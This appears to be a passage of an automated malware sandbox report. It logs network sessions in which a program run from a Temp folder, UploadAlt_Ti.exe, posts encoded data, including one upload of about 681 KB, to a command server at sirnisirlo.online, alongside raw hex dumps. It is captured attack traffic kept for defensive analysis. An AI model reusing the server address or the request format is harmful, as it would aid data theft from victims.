2024-11-14 18:57:46 UTC	560	IN	Data Raw: 33 37 64 35 0d 0a 1c c5 01 01 6a 7a 00 00 00 00 00 00 00 00 00 00 14 00 5c 08 62 04 20 00 cb 08 62 04 17 15 09 03 04 b5 e6 cb 72 11 a7 37 74 99 99 3c 9c fc da f4 d2 b6 da c0 c0 d2 f0 a0 9c fc da f4 d2 58 b6 da c0 c0 d2 f0 58 be f0 c6 fc da d6 d2 14 00 5d 0b dd 03 0a 00 cb 08 dd 03 17 15 09 03 04 b5 e6 cb 72 11 a7 37 74 99 99 3c 80 c6 d6 ca c4 58 90 da f0 da 14 00 13 0d 89 09 06 00 cb 08 89 09 17 15 09 03 04 b5 b7 cb 72 11 a7 37 74 99 99 3c 96 f2 da fc d0 da 10 00 56 0b e7 03 04 00 b7 04 e7 03 17 15 09 03 04 b5 40 b7 f9 5d 91 89 4a 0e 03 79 10 00 38 06 46 0c 04 00 b7 04 46 0c 17 15 09 03 04 b5 b7 b7 da ac 6d 44 69 ff ff b4 10 00 52 08 0c 0f 04 00 b7 04 0c 0f 17 15 09 03 04 b5 40 b7 67 b5 9a ee d4 e6 08 1e 14 00 6b 0a 3c 0d 12 00 cb 08 3c 0d 17 15 09 03 04 Data Ascii: 37d5jz\b br7t<XX]r7t<Xr7t<V@]Jy8FFmDiR@gk<<
2024-11-14 18:57:46 UTC	1369	IN	Data Raw: b7 c0 2e 3d 07 93 bc cd 10 00 fd 0b 1f 06 04 00 b7 04 1f 06 17 15 09 03 04 b5 31 b7 cb 1b 24 f0 78 48 b6 00 14 00 e2 05 70 08 05 00 cb 08 70 08 17 15 09 03 04 b5 e6 cb 72 11 a7 37 74 99 99 3c 4c 44 c0 c6 d6 14 00 57 0b 1c 07 0b 00 cb 08 1c 07 17 15 09 03 04 b5 07 cb 72 11 a7 37 74 99 99 3c d4 ca fc d2 d4 c6 e8 44 d2 e8 d2 14 00 16 0d 1e 03 08 00 b6 08 1e 03 17 15 09 03 04 b5 3b b6 dd 09 c2 b0 54 bc 78 b2 e9 0f 0a 0d 48 4e dd ad 14 00 c6 0a 05 03 12 00 cb 08 05 03 17 15 09 03 04 b5 b7 cb 72 11 a7 37 74 99 99 3c f6 da c0 c0 d2 f0 fe a0 9e c6 ca c4 c6 c2 ca a0 d0 dc 14 00 d1 04 55 03 29 00 cb 08 55 03 17 15 09 03 04 b5 98 cb 72 11 a7 37 74 99 99 3c be c6 d4 f0 f6 da fc d2 a0 82 da fc f0 ca c4 58 b8 fc ca ce fc ea c0 a0 b6 ca c4 be 9e b8 58 7c 58 86 f4 d2 fc Data Ascii: .=1$xHppr7t<LDWr7t<D;TxHNr7t<U)Ur7t<XX\|X
2024-11-14 18:57:46 UTC	1369	IN	Data Raw: d2 fc 14 00 84 0b 20 01 1c 00 cb 08 20 01 17 15 09 03 04 b5 b7 cb 72 11 a7 37 74 99 99 3c da f0 c6 c2 ca de a0 80 c6 de da c0 58 be f0 c6 fc da d6 d2 a0 c0 d2 f4 d2 c0 d0 dc 10 00 6c 0b f4 06 04 00 b7 04 f4 06 17 15 09 03 04 b5 31 b7 01 98 5f 73 b2 cb cd 83 14 00 2a 03 6f 0c 09 00 cb 08 6f 0c 17 15 09 03 04 b5 07 cb 72 11 a7 37 74 99 99 3c c6 f8 d2 fc da 44 d2 e8 d2 10 00 72 0c c3 0a 04 00 b7 04 c3 0a 17 15 09 03 04 b5 31 b7 08 df 6a 79 bf 8c f8 89 14 00 19 02 78 02 08 00 cb 08 78 02 17 15 09 03 04 b5 31 cb 72 11 a7 37 74 99 99 3c b6 d2 dc 58 90 da f0 da 10 00 19 0a 6f 00 04 00 b7 04 6f 00 17 15 09 03 04 b5 e7 b7 d8 ca 41 f5 ca 1f d2 05 14 00 37 0f 50 03 11 00 cb 08 50 03 17 15 09 03 04 b5 e7 cb 72 11 a7 37 74 99 99 3c be 86 94 b0 b6 9a bc 92 a0 b0 ca d6 Data Ascii: r7t<Xl1_s*oor7t<Dr1jyxx1r7t<XooA7PPr7t<
2024-11-14 18:57:46 UTC	1369	IN	Data Raw: 00 cb 08 e5 06 17 15 09 03 04 b5 40 cb 72 11 a7 37 74 99 99 3c 44 de fc d2 d0 fe 14 00 2e 0d 75 04 08 00 b6 08 75 04 17 15 09 03 04 b5 e7 b6 08 ff 1a 14 76 47 c1 96 3e f9 d2 a9 6a b5 64 89 14 00 29 08 7d 01 1f 00 cb 08 7d 01 17 15 09 03 04 b5 e3 cb 72 11 a7 37 74 99 99 3c be 86 94 b0 b6 9a bc 92 a0 bc d2 d6 ca fe f0 d2 fc d2 d0 9a f8 f8 c0 ca de da f0 ca c6 c4 fe 14 00 87 0b 33 00 08 00 b6 08 33 00 17 15 09 03 04 b5 e7 b6 bf bf 8a a6 2a 4a 59 e2 88 b9 42 1b 36 b8 fc fd 14 00 48 06 20 0a 08 00 b6 08 20 0a 17 15 09 03 04 b5 07 b6 8b 19 4b c6 49 de 4c da bd 1f 83 7b 55 2c e9 c5 14 00 0f 02 36 08 1a 00 cb 08 36 08 17 15 09 03 04 b5 98 cb 72 11 a7 37 74 99 99 3c b8 fc c6 d6 fc da c2 fe a0 b6 ca c4 be 9e b8 a0 b6 ca c4 be 9e b8 44 ca c4 ca 14 00 99 08 5f 0b 08 Data Ascii: @r7t<D.uuvG>jd)}}r7t<33*JYB6H KIL{U,66r7t<D_
2024-11-14 18:57:46 UTC	1369	IN	Data Raw: e7 cb 72 11 a7 37 74 99 99 3c f4 c4 de a0 bc d2 da c0 b4 84 9e a0 d0 da f0 da 44 cc fe c6 c4 10 00 e1 09 75 09 04 00 b7 04 75 09 17 15 09 03 04 b5 b7 b7 32 76 81 1c 81 25 13 ec 14 00 62 0a e2 0d 08 00 b6 08 e2 0d 17 15 09 03 04 b5 31 b6 42 95 72 93 b4 46 ac d1 71 93 ba 2e a8 b4 09 ce 14 00 5b 02 08 0b 09 00 cb 08 08 0b 17 15 09 03 04 b5 31 cb 72 11 a7 37 74 99 99 3c 92 9c b6 d2 dc b4 ca d2 f6 10 00 a9 07 08 02 04 00 b7 04 08 02 17 15 09 03 04 b5 b7 b7 61 31 9c 64 d3 83 fb 91 14 00 b6 02 25 07 07 00 cb 08 25 07 17 15 09 03 04 b5 e6 cb 72 11 a7 37 74 99 99 3c 88 ca fe f0 c6 fc ea 14 00 6e 0e 52 0d 0a 00 cb 08 52 0d 17 15 09 03 04 b5 b7 cb 72 11 a7 37 74 99 99 3c 82 c6 c4 d2 fc c6 9e c6 fc d2 14 00 d9 05 55 0f 0b 00 cb 08 55 0f 17 15 09 03 04 b5 e6 cb 72 11 Data Ascii: r7t<Duu2v%b1BrFq.[1r7t<a1d%%r7t<nRRr7t<UUr
2024-11-14 18:57:46 UTC	1369	IN	Data Raw: fc 05 17 15 09 03 04 b5 05 b7 87 80 6c 91 35 d7 fe 61 14 00 1e 04 97 08 06 00 cb 08 97 08 17 15 09 03 04 b5 b9 cb 72 11 a7 37 74 99 99 3c 4c 44 c6 f4 f8 c4 10 00 16 01 49 0f 04 00 b7 04 49 0f 17 15 09 03 04 b5 e6 b7 cd 40 30 1f 7b 13 a2 ef 14 00 88 09 18 06 05 00 cb 08 18 06 17 15 09 03 04 b5 31 cb 72 11 a7 37 74 99 99 3c 4c 44 f0 e8 f0 14 00 65 01 aa 08 08 00 cb 08 aa 08 17 15 09 03 04 b5 3b cb 72 11 a7 37 74 99 99 3c f8 fc c6 d4 ca c0 d2 fe 14 00 27 0e 0e 07 08 00 b6 08 0e 07 17 15 09 03 04 b5 31 b6 92 ae 5c b5 49 8e 30 c8 a4 a8 94 08 55 7c 95 d7 10 00 1b 0e 27 07 04 00 b7 04 27 07 17 15 09 03 04 b5 05 b7 e8 20 cb dc 5a 73 59 2c 14 00 94 0f fd 0c 11 00 cb 08 fd 0c 17 15 09 03 04 b5 e6 cb 72 11 a7 37 74 99 99 3c de c8 fc c6 c2 ca f2 c2 a6 dc fc c6 f6 fe Data Ascii: l5ar7t<LDII@0{1r7t<LDe;r7t<'1\I0U\|'' ZsY,r7t<
2024-11-14 18:57:46 UTC	1369	IN	Data Raw: 04 b5 e6 b7 a9 58 0a 8a 1b ea 6d 7f 14 00 d5 06 d4 03 23 00 cb 08 d4 03 17 15 09 03 04 b5 b7 cb 72 11 a7 37 74 99 99 3c be c6 d4 f0 f6 da fc d2 a0 c2 c6 c4 d2 fc c6 42 f8 fc c6 cc d2 de f0 a0 c2 c6 c4 d2 fc c6 42 de c6 fc d2 14 00 b9 03 f2 09 0a 00 cb 08 f2 09 17 15 09 03 04 b5 31 cb 72 11 a7 37 74 99 99 3c 80 c6 d6 ca c4 58 90 da f0 da 14 00 fe 0d ad 01 07 00 cb 08 ad 01 17 15 09 03 04 b5 05 cb 72 11 a7 37 74 99 99 3c f2 fe d2 fc f0 da d6 14 00 32 06 27 04 0a 00 cb 08 27 04 17 15 09 03 04 b5 b9 cb 72 11 a7 37 74 99 99 3c de c6 c4 d4 ca d6 a6 d0 ca fc 10 00 d6 07 21 07 04 00 b7 04 21 07 17 15 09 03 04 b5 e6 b7 24 7b 76 54 97 28 e4 a4 14 00 da 09 a1 05 08 00 b6 08 a1 05 17 15 09 03 04 b5 e7 b6 ef 21 57 88 03 bf 81 7a d9 27 9f 35 1f 4d 24 65 14 00 2c 00 d1 Data Ascii: Xm#r7t<BB1r7t<Xr7t<2''r7t<!!${vT(!Wz'5M$e,
2024-11-14 18:57:46 UTC	1369	IN	Data Raw: 00 b7 04 4d 0d 17 15 09 03 04 b5 e6 b7 bd 9e 46 b3 0f 2c 21 46 10 00 9e 09 0a 08 04 00 b7 04 0a 08 17 15 09 03 04 b5 e7 b7 0a 59 f8 f5 e8 c9 6a 05 14 00 37 0d a0 0a 08 00 b6 08 a0 0a 17 15 09 03 04 b5 e6 b6 70 51 a4 e8 ed 9a f0 58 46 57 6c 55 f1 68 55 47 14 00 62 0e 2f 07 07 00 cb 08 2f 07 17 15 09 03 04 b5 e6 cb 72 11 a7 37 74 99 99 3c 88 ca fe f0 c6 fc ea 10 00 d5 03 70 0b 04 00 b7 04 70 0b 17 15 09 03 04 b5 b7 b7 f1 96 ed 1e 43 24 8a eb 14 00 61 0f 43 0b 11 00 cb 08 43 0b 17 15 09 03 04 b5 e6 cb 72 11 a7 37 74 99 99 3c de c8 fc c6 c2 ca f2 c2 a6 dc fc c6 f6 fe d2 fc fe 14 00 67 03 f8 07 08 00 b6 08 f8 07 17 15 09 03 04 b5 b9 b6 8f 6d 8a e1 ae 3d 1d 0a b8 6b 42 5c b2 cf b8 15 10 00 4d 09 d9 06 04 00 b7 04 d9 06 17 15 09 03 04 b5 b7 b7 87 29 ef f4 35 7a Data Ascii: MF,!FYj7pQXFWlUhUGb//r7t<ppC$aCCr7t<gm=kB\M)5z
2024-11-14 18:57:46 UTC	1369	IN	Data Raw: 10 00 5b 0f de 09 04 00 b7 04 de 09 17 15 09 03 04 b5 b7 b7 87 e3 e5 2a 34 b0 77 da 10 00 d7 0d 41 00 04 00 b7 04 41 00 17 15 09 03 04 b5 b7 b7 0f 2a 4d b9 bd 7d df 49 10 00 5b 00 05 0c 04 00 b7 04 05 0c 17 15 09 03 04 b5 e7 b7 7b 43 86 26 d9 37 14 d6 14 00 de 05 28 04 08 00 cb 08 28 04 17 15 09 03 04 b5 31 cb 72 11 a7 37 74 99 99 3c 4c 44 fe fa c0 ca f0 d2 14 00 2f 0c d2 09 01 00 cb 08 d2 09 17 15 09 03 04 b5 b7 cb 72 11 a7 37 74 99 99 3c 4c 14 00 09 02 cb 05 22 00 cb 08 cb 05 17 15 09 03 04 b5 e7 cb 72 11 a7 37 74 99 99 3c bc d2 da c0 b4 84 9e a0 f4 c4 de f4 ca d2 f6 d2 fc 44 d0 a0 f8 da fe fe f6 c6 fc d0 fe 44 cc fe c6 c4 14 00 1a 0b 29 0e 27 00 cb 08 29 0e 17 15 09 03 04 b5 31 cb 72 11 a7 37 74 99 99 3c b0 c8 f2 c4 d0 d2 fc dc ca fc d0 a0 9a f8 f8 90 Data Ascii: [4wAAM}I[{C&7((1r7t<LD/r7t<L"r7t<DD)')1r7t<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	58010	188.114.96.3	443	7568	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:48 UTC	417	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 53 Host: sirnisirlo.online
2024-11-14 18:57:48 UTC	53	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 03 fe ff ff ff 02 00 00 00 00 00 00 00 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-11-14 18:57:48 UTC	733	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 18:57:48 GMT Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m15MTkZoe8vdQpOorEgRSylO%2BvU3evCReiuhuXzK%2Fi2%2BfKoHFH7sKlFi3N2AIjvsiMTcnzXuUr8gOqb3P6J1QlIIC7BSsUXjH4thfgJyBPlMozp3HI6CvGX1VPHu2uOo%2BY%2FQbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293ab4bdfa2cc7-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1392&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1106&delivery_rate=1952798&cwnd=251&unsent_bytes=0&cid=fa14aaba3a38e332&ts=459&x=0"
2024-11-14 18:57:48 UTC	84	IN	Data Raw: 34 65 0d 0a fe ff ff ff 3e 00 00 00 00 00 00 00 00 00 00 00 91 9c ce 14 a1 ae 02 ce 0c 85 56 de ce 17 fd e1 44 ce 22 c7 31 38 ce 26 75 b6 d6 ce 03 d0 c6 1f ce 29 c4 8a b7 ce 22 7f cf 0c ce 02 03 ca 2b ce 04 73 90 21 ce 3e 9c 99 b4 ce 37 d1 d4 f3 0d 0a Data Ascii: 4e>VD"18&u)"+s!>7
2024-11-14 18:57:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	58011	188.114.96.3	443	7568	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:49 UTC	418	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 208 Host: sirnisirlo.online
2024-11-14 18:57:49 UTC	208	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 62 55 18 22 95 00 00 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c dc b2 28 5c 1e 18 18 18 18 18 18 18 18 18 18 18 3d 99 39 dc b2 28 5c dc 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 14 40 18 18 18 18 18 18 18 42 18 42 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 b8 8e 14 16 18 18 18 18 18 18 18 18 18 18 18 18 1a 18 18 18 b8 8e 12 14 18 18 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 18 18 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 e7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: bU"r;z<(\=9(\@BB
2024-11-14 18:57:49 UTC	715	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:57:49 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gSEUQdVYq%2FaQFwTS98aeh7xvK6BssH4GURn4hfInUUg%2FR8ggJh0j7CORpb3M4V2ua1TUnH%2BntMp55jPc%2FK7iQ%2BRqudX0KxnXMJd%2BTqX6VWkrjboqTiI5mSIf5axmAONrCq1KpQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293abc48edddab-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1382&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1262&delivery_rate=2138847&cwnd=252&unsent_bytes=0&cid=b8705a480fb7fac3&ts=416&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	58013	188.114.96.3	443	7568	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:53 UTC	421	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 681457 Host: sirnisirlo.online
2024-11-14 18:57:53 UTC	15331	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 5c 46 f3 15 35 10 0a 00 88 00 00 00 08 00 00 00 72 3b 04 fa 7a 9d 99 3c a0 94 ff 32 18 1e 18 18 18 18 18 18 18 18 18 18 3f 99 39 3d 29 99 39 55 9e c8 fc c6 c2 d2 ab 72 9e 6c a0 b2 fe d2 fc fe a0 c8 f2 dc d2 fc f0 a0 9a f8 f8 90 da f0 da a0 80 c6 de da c0 a0 96 c6 c6 d6 c0 d2 a0 9e c8 fc c6 c2 d2 a0 b2 fe d2 fc 58 90 da f0 da 3b 2b 99 39 57 90 d2 d4 da f2 c0 f0 ab 62 9e 6c a0 b2 fe d2 fc fe a0 c8 f2 dc d2 fc f0 a0 9a f8 f8 90 da f0 da a0 80 c6 de da c0 a0 96 c6 c6 d6 c0 d2 a0 9e c8 fc c6 c2 d2 a0 b2 fe d2 fc 58 90 da f0 da a0 90 d2 d4 da f2 c0 f0 ab 70 de c8 fc c6 c2 ca f2 c2 a6 dc fc c6 f6 fe d2 fc fe a0 9e c8 fc c6 c2 d2 a0 f8 fc c6 d4 ca c0 d2 fe a0 90 d2 d4 da f2 c0 f0 a0 80 c6 d6 ca c4 58 90 da Data Ascii: \F5r;z<2?9=)9UrlX;+9WblXpX
2024-11-14 18:57:53 UTC	15331	OUT	Data Raw: 8e ce f8 f2 c4 8c 72 f2 f8 76 b2 f8 92 c4 84 c2 86 9e f2 aa 86 ea de fa 9c fc 8c 8e 4e c2 96 f6 ac ac b8 f6 86 70 68 70 d2 fe 96 b4 82 da 4e 90 78 7e 9a 78 7e 8c ba f4 86 e8 b2 8a c2 9c da b4 88 fc 8e dc dc aa 9c 7c b2 cc c8 94 96 9c d4 dc 96 78 8c 88 9a 7e cc d6 d6 8e fc 9a 7e 9a b2 c2 86 ba f6 c6 f2 70 96 da ec 9c 6a e8 ec f2 fe 46 68 72 88 c2 78 8a 46 dc d2 88 f0 be f0 70 82 c6 be f4 ba f6 d4 86 ec 8c 72 4e 8e be 8e d4 be bc 6a f0 aa c2 ec 90 70 da b4 f0 7a 7c 8e c0 b4 da d2 68 9e f0 f0 b4 86 82 8a 92 b4 ba 74 88 fa fc fe bc ec 72 c8 46 de b4 cc ea dc 94 aa 86 96 4e be ba c0 7c 9c de 88 70 84 7c 86 be ea 88 96 c2 7a 70 b6 c8 7e f8 c4 82 9a 8e dc f6 ea f8 f8 76 ec f8 78 ca c0 b6 76 d6 6a b4 8a 9e 82 7e 70 7a 7a ca 96 80 74 f2 d6 72 bc b0 b8 46 dc 8a aa Data Ascii: rvNphpNx~x~\|x~~pjFhrxFprNjpz\|htrFN\|p\|zp~vxvj~pzztrF
2024-11-14 18:57:53 UTC	15331	OUT	Data Raw: 9a d4 9e 9e a8 ec ba ec de 6a c6 8c ba ca 70 74 ac 7a 74 7e ba 94 dc 88 92 bc 8e c8 c6 de c8 bc c6 ba 94 6a 6a f2 ba 6a ba 68 8a 74 88 8e 70 b0 bc 76 8e 80 b0 90 ea ea b0 7e 72 d2 7e d6 ea f2 86 96 c8 c8 80 f4 b0 c2 f4 b6 c6 c6 74 ec 78 b2 b8 9c 86 68 9c 74 f4 68 7e 6a 94 8c 76 70 94 fa 6a 7e 92 b2 82 8c 92 ca c8 9c d6 c6 68 ea 9e 88 8c 9c d6 c6 68 e8 9e b8 8c 9c d6 fc fe ac 9c 8a b2 d6 f6 b0 78 82 d6 c2 8e ba 70 86 82 82 d6 fe 92 d6 f6 be de aa 9c 8e b2 d6 f6 be de ac 9c 92 84 9c d6 ce 4e 72 9c 90 f4 9c c8 c6 74 ca 82 ce 96 8e d2 7a ce b2 c0 9e 76 f4 aa 7a 94 ba ea f4 f6 78 ca 70 80 be 72 f4 78 fe 9e ce fa d0 90 76 9a c6 8e 88 7a 4e c8 ce b4 9c 8e d4 be f4 b6 bc be b2 bc cc 46 80 c6 fa 9c b2 4e cc ce b6 9c da a8 b0 ec ec 82 c6 94 92 fa c4 a8 7c 9c bc b2 Data Ascii: jptzt~jjjhtpv~r~txhth~jvpj~hhxpNrtzvzxprxvzNFN\|
2024-11-14 18:57:53 UTC	15331	OUT	Data Raw: 46 fc 82 f8 80 aa 7c b2 e8 de 94 68 c0 9c dc b2 74 f2 b6 ac ba be ac fa 9a fc 6a be f8 de 4e 96 9e 88 88 88 be f8 b8 ba d2 b6 72 fa b8 7a 92 9a 80 b6 7e c4 c8 f2 46 b2 9c c2 c6 6a 70 fa 70 68 fe 8e fe 7c 9e fc dc 6a 9e 72 a8 8a 82 7a ea 68 b2 f8 d6 f4 d4 de 70 fc 9c d2 fa 8a 70 aa da fc da 78 a8 8e f0 c2 bc 8a c0 7e d6 74 f4 88 d4 bc 74 c4 c6 dc ce 7a c2 b4 f6 d2 c4 ac ea de bc ac ce 46 7e 7c d4 b2 ca 70 8e cc ba b0 70 f2 b2 90 c2 f2 d2 b2 d6 fc 6a c0 94 e8 88 86 86 76 fe 9e 96 70 de 6a c2 f0 ca ec ce c8 7c b0 da ea b8 c8 dc fe c2 72 fe aa b0 76 4e 86 e8 f0 46 8e fe 7a de f8 e8 be 9c de 4e f4 ac a8 fe aa f2 bc 9a 86 8e ce 7c fa 78 f8 80 fc ce b8 e8 d4 9c 82 72 da 9c b0 b8 46 92 fa b0 92 aa ec a8 74 76 ca ca f4 9a da 92 ce b8 6a c4 ea 9c 74 7e 96 86 92 70 Data Ascii: F\|htjNrz~Fjpph\|jrzhppx~ttzF~\|ppjvpj\|rvNFzN\|xrFtvjt~p
2024-11-14 18:57:53 UTC	15331	OUT	Data Raw: 76 7a aa 8a 7c 6a d6 7e 7c 9c f2 76 4e cc aa f2 fc 82 d6 aa 96 a8 dc f2 aa b4 c8 e8 4e 68 c8 86 4e 7e da 96 94 be 76 ba de 96 fe 88 d6 ea 74 b4 76 ea 86 76 94 c6 f6 c0 46 ba a8 d0 b6 80 b2 a8 8a fa c4 fa fc fc 72 7a 46 84 8a cc c8 94 9a b8 82 ac 7a c0 74 f4 ca ca 80 86 9a 94 fa 88 ec ca b0 8a ec 6a ba 46 7a ac c8 86 f4 46 70 d4 f8 46 f2 b8 70 d4 fc f4 4e 88 74 46 46 c8 4e c4 4e 70 46 c8 4e f2 46 70 d4 fc 46 4e 88 74 d4 76 cc 4e 88 74 76 46 c8 4e f4 46 70 d4 f8 46 f2 b8 70 d4 fc f4 4e 88 74 46 46 c8 4e c4 4e 70 46 c8 4e f2 46 70 d4 fc 46 4e 88 74 d4 76 cc 4e f4 f6 c4 b6 46 f6 f0 fe 46 d0 6a f6 8a be f0 68 e8 78 76 ea 96 94 70 f6 9a 8e a8 ba 88 c6 9c 8e 88 f8 f4 b0 94 8e ce e8 c0 c8 c6 ec 8c c6 74 94 be 96 ce a8 7c de 74 68 76 be ac b0 f6 72 96 bc d0 7e 76 Data Ascii: vz\|j~\|vNNhN~vtvvFrzFztjFzFpFpNtFFNNpFNFpFNtvNtvFNFpFpNtFFNNpFNFpFNtvNFFjhxvpt\|thvr~v
2024-11-14 18:57:53 UTC	15331	OUT	Data Raw: d4 7e ca 78 aa b8 e8 46 d4 9a bc e8 82 7c 9c 82 de cc 90 4e d0 94 82 b0 ca 8e ce 76 c4 9e ac a8 46 fe ce 90 82 68 c6 f0 94 c6 ce ea c6 c2 9e 92 fc ca ba 74 72 ec b2 b2 84 c2 46 dc 90 70 c6 bc 8c 88 96 7c ec c6 b8 da cc 9c d0 cc 80 82 7e dc 74 ba 8a bc c0 92 ca fe 6a 8e 86 88 da 92 b0 74 dc de de ca b8 70 b0 f8 de dc 92 be 86 7e 7e 8a bc f6 ea ca 8c 86 88 8c e8 d6 92 f8 6a 92 ca c6 b4 fa 9a da 46 8a 94 ac 8c aa f4 aa c6 7c c4 7c fa 84 96 bc b2 46 c4 7e 92 84 be 68 b6 cc aa c6 94 96 d6 78 b0 90 70 ca f2 f8 7c 96 88 e8 9e c4 68 b8 c4 f4 b6 80 f2 ce d4 c8 9c f2 46 9e c0 7e 84 d0 86 9c 86 96 96 4e ec 9c c8 e8 76 86 c8 78 9a 8e d6 fc 76 d6 cc ac b6 b0 f8 f0 7a 68 dc c2 82 b4 92 d0 9e 84 b4 de cc 8e dc da e8 c8 f4 80 8e ba f0 7e 72 8a 7c cc c0 8c ba ce ec d6 76 Data Ascii: ~xF\|NvFhtrFp\|~tjtp~~jF\|\|F~hxp\|hF~Nvxvzh~r\|v
2024-11-14 18:57:53 UTC	15331	OUT	Data Raw: be 80 78 fe 74 d6 b6 70 82 d6 b4 88 f8 84 68 82 d2 de 78 dc 7a f4 c2 80 92 d6 ca c6 8e d6 94 be ba ba 9c dc 78 92 be d6 ea bc 88 8a ca 7c 74 d2 cc 96 f0 92 d0 fe 9a 9c 88 de 78 c2 74 9e d0 be 7c 70 de 9e c0 be 6a bc 8e c8 ea b8 9e c6 7c 8c fa ca be ca 7a ea c8 c2 f8 fe c6 b4 84 9a ac bc f2 be 90 ca e8 b4 f2 b8 ec 90 ce c2 de 84 72 88 a8 e8 9c dc b4 7e bc de 8e ac fe bc b2 82 cc 9e 4e 68 88 da 80 9a f0 6a ea d6 74 74 f4 8c a8 9c 76 f0 68 7e c0 86 f0 bc 86 94 70 6a c0 d0 9c 8e fa de 9a c6 d4 c6 c0 9e f8 bc a8 f4 78 bc bc ca f0 b2 f4 de d0 c8 ea 82 c2 e8 46 b0 8c 88 c6 b4 c4 c6 e8 bc b6 8e ce 92 aa d6 f8 92 c6 68 fc 8c 68 9e f0 88 78 8e 90 c8 86 f8 ce be 4e d6 f2 d6 da 74 d4 b4 b4 dc b0 86 9e ea 6a da 7c f0 c6 d4 80 78 86 cc b0 88 76 ba 82 78 b8 9e a8 dc d0 Data Ascii: xtphxzx\|txt\|pj\|zr~Nhjttvh~pjxFhhxNtj\|xvx
2024-11-14 18:57:53 UTC	15331	OUT	Data Raw: 96 88 ec 68 e8 92 be 86 f4 70 f4 c4 9c 86 ce 96 b6 9c 72 b2 f2 fa 6a dc 8c 72 b8 fc fc ac 86 d0 fa cc de 7c ba e8 90 c2 b0 cc 90 7e 7c ba da f6 f4 74 d2 72 aa 72 c0 84 cc 82 9e d0 d2 72 ea 72 7e 7c c4 a8 80 ec ea 80 c8 fe c2 bc c8 f4 ba de 7c 72 b8 de 7c 88 72 f2 6a 80 c6 aa 4e 7e f2 bc bc 92 b2 be 94 b2 c4 b2 f2 ca a8 fa 8e 84 f0 80 92 82 68 84 f4 d0 80 fe ca 6a ac 46 7c d2 d4 fc d2 88 e8 4e f2 c8 6a da 7c aa 72 88 ce dc b8 72 a8 d6 90 d4 7e e8 46 e8 d4 de b0 7e c2 68 cc 7e fc 7c b2 d2 74 9e b4 ca fe f8 c0 82 70 dc c2 ac c4 ba d4 4e 7a 46 82 f4 e8 b0 ac 94 c2 aa 68 ea 82 ec 6a d6 72 c4 ec 92 ec 9c 92 ec dc ea 8a ec 46 6a c2 78 72 46 94 c6 cc 72 c4 d4 68 f0 74 a8 aa c8 96 c4 bc ac ea 7c ca ac f6 7c fa f0 da 